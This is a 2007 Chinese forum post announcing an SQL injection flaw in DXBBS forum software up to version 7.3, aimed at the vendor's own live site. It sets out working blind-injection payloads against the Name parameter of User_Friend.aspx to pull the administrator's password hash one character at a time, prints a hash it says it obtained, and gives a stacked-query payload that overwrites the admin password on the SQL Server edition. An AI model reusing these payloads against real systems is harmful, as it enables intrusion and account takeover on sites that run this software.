| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 314 人关注过本帖
标题:dxbbs漏洞(通杀7.3以前所有版本)
取消只看楼主 加入收藏
什么是么什
Rank: 1
等 级:新手上路
帖 子:83
专家分:0
注 册:2007-4-11
收藏
 问题点数:0 回复次数:0 
dxbbs漏洞(通杀7.3以前所有版本)

漏洞出现在User_Friend.aspx , 由于过滤不严,造成name允许注入, 不多说了,自己看吧。
-------------------------------------------------------------------------------------------
http://www . dxbbs . cn/

这是DXBBS官方网站,版本是7.3,用的access数据库

在User_Friend.aspx过滤了=Add&Name=admin加上''

典型的过滤不严,由于是access,在没有工具的情况下,只能一个一个猜解了

默认管理员是admin, 我们来猜解admin的密码, 工具是老兵的注入浏览器,用的是asc转换猜解法, 我已经下载了一份源代码,可以看一下数据库结构

用户表:DXBBS_user 密码字段:user_pass

http://www . dxbbs . cn/User_F...过滤了=Add&Name=admin'' {v} and ''a''=''a , 因为后面还有一个单引号,没办法注释,所以只能这么构造注入语句,{v}是变量

首先使用语句确定密码长度
and (select top 1 len(user_pass) from DXBBS_user)=16
返回:好友已存在 说明密码的确是16位,经过了MD5加密

接下来猜解密码:
猜解第一位: and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57 返回:数据不存在,猜测错误,说明密码第一位的ASC值小于57

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=55
正确,说明密码第一位的ASC值大于等于55

and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=56
返回错误,说明密码第一位的ASC值大于小于56

既然大于等于55,小于56,那么这个数值就是55,ASC55对应的字符是:7,也就是说,密码第一位是7,

猜测密码第二位就是把
and (select top 1 asc(mid(user_pass,1,1)) from dxbbs_user where user_name=''admin'')>=57
改成
and (select top 1 asc(mid(user_pass,2,1)) from dxbbs_user where user_name=''admin'')>=57

后面的以此类推

5分钟后得到管理员密码:74e92e9ececa0ae7

这是MD5加密过的,至于怎么得到明文,不要问我,自己碰运气吧

下面介绍SQL版利用方法:
ser_Friend.aspx过滤了=Add&Name=大蝉;Update [Dxbbs_user] set user_pass=''7a57a5a743894a0e'' where user_name=''admin'';--

搜索更多相关主题的帖子: dxbbs 漏洞 
2007-04-27 23:56
快速回复:dxbbs漏洞(通杀7.3以前所有版本)
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.031037 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved